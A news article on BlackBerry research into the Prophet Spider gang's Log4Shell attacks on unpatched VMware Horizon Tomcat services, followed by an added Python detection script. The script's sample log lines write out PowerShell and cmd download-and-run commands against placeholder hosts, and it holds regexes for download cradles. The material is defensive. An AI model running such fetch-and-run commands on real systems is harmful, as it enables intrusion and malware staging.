The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems.

A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.

In a blog published Wednesday, BlackBerry researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.

The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.

One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:\Windows\Temp\7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group.

Prophet Spider foothold suggests an uptick in exploits

BlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will perform tasks such as stealing data, moving through the system laterally, or infecting it with ransomware.
“If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”

“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds.

Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the BlackBerry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.

No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.’”

Many VMware implementations remain unpatched

In their blog post, the BlackBerry researchers noted that the exact number of applications—and their various versions—affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation.

“It’s difficult for many organizations to scan and patch all their digital assets, even just the external facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them. And if you can’t scan them, then you can’t have an effective vulnerability management program.”
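The detection points the researchers describe above (ws_TomcatService.exe as the parent of a PowerShell download cradle, the C:\Windows\Temp\7fde staging path, and the wget.bin downloader) can be expressed as a small matcher over process-creation telemetry. What follows is an added example written for this page; it is not code from the article or from BlackBerry. The log lines are constructed, the field names follow the Sysmon process-creation convention, and the VMware Horizon install path, host names and timestamps are assumptions.

```python
"""Added example: match the Prophet Spider tradecraft described in the
article against process-creation telemetry.  Every log line below is
constructed; the VMware Horizon install path, host names and times are
assumptions, not values taken from the article."""
import re
from pathlib import PureWindowsPath

# Assumed Horizon install location (not from the article).
HORIZON_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon-style (Event ID 1) process-creation events, one per line.
SAMPLE_EVENTS = [
    # Tomcat service spawning a PowerShell download cradle that stages wget.bin
    f'UtcTime=2022-01-26T10:15:01 ParentImage="{HORIZON_TOMCAT}" Image="{POWERSHELL}" '
    r'CommandLine="powershell -nop -w hidden -Command Invoke-WebRequest '
    r'http://PLACEHOLDER-HOST/stage2 -OutFile C:\Windows\Temp\7fde\wget.bin"',
    # Tomcat service running the staged wget.bin to fetch more files
    f'UtcTime=2022-01-26T10:15:09 ParentImage="{HORIZON_TOMCAT}" Image="C:\\Windows\\System32\\cmd.exe" '
    r'CommandLine="cmd /c C:\Windows\Temp\7fde\wget.bin http://PLACEHOLDER-HOST/stage3"',
    # Benign: an administrator running PowerShell from Explorer
    f'UtcTime=2022-01-26T10:20:00 ParentImage="C:\\Windows\\explorer.exe" Image="{POWERSHELL}" '
    'CommandLine="powershell -Command Get-Process"',
    # Benign: normal service start of the Horizon Tomcat service
    f'UtcTime=2022-01-26T09:00:00 ParentImage="C:\\Windows\\System32\\services.exe" '
    f'Image="{HORIZON_TOMCAT}" CommandLine="{HORIZON_TOMCAT}"',
    # Suspicious but not Horizon-related: a download cradle from an interactive session
    f'UtcTime=2022-01-26T11:00:00 ParentImage="C:\\Windows\\explorer.exe" Image="{POWERSHELL}" '
    'CommandLine="powershell -Command Invoke-WebRequest http://PLACEHOLDER-INTERNAL/tool.zip -OutFile tool.zip"',
]

# key=value tokens; a double-quoted value may contain spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Indicators taken from the article: shells spawned by the Horizon Tomcat
# service, common PowerShell download cradles, the 7fde staging folder, wget.bin.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
STAGING_PATH_RE = re.compile(r"C:\\Windows\\Temp\\7fde", re.I)
WGET_BIN_RE = re.compile(r"\bwget\.bin\b", re.I)


def parse_event(line: str) -> dict:
    """Flatten one key=value log line into a dict of field -> value."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}


def classify(event: dict) -> list:
    """Return the list of indicator names that a single event matches."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    child = PureWindowsPath(event.get("Image", "")).name.lower()
    cmd = event.get("CommandLine", "")
    findings = []
    if parent == "ws_tomcatservice.exe" and child in SHELLS:
        findings.append("tomcat_spawned_shell")
    if CRADLE_RE.search(cmd):
        findings.append("download_cradle")
    if STAGING_PATH_RE.search(cmd):
        findings.append("prophet_spider_staging_path")
    if WGET_BIN_RE.search(cmd):
        findings.append("wget_bin")
    return findings


def analyze(lines) -> list:
    """Run every line through the matcher; keep only events with findings.
    A shell spawned by the Horizon Tomcat service that also carries any other
    indicator is rated high, everything else medium."""
    alerts = []
    for index, line in enumerate(lines):
        findings = classify(parse_event(line))
        if not findings:
            continue
        tomcat_plus = "tomcat_spawned_shell" in findings and len(findings) > 1
        alerts.append({"index": index,
                       "severity": "high" if tomcat_plus else "medium",
                       "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"event {alert['index']}: {alert['severity']} "
              f"({', '.join(alert['findings'])})")
```

The parent/child check is the one that matters most here: a download cradle alone is common enough in administrative activity that the interactive example is rated only medium, while anything the Horizon Tomcat service itself spawns that also touches the staging path or wget.bin is the pattern the researchers tied to this actor. In a real deployment the same logic maps onto a SIEM rule keyed on the ParentImage and CommandLine fields rather than on flattened text.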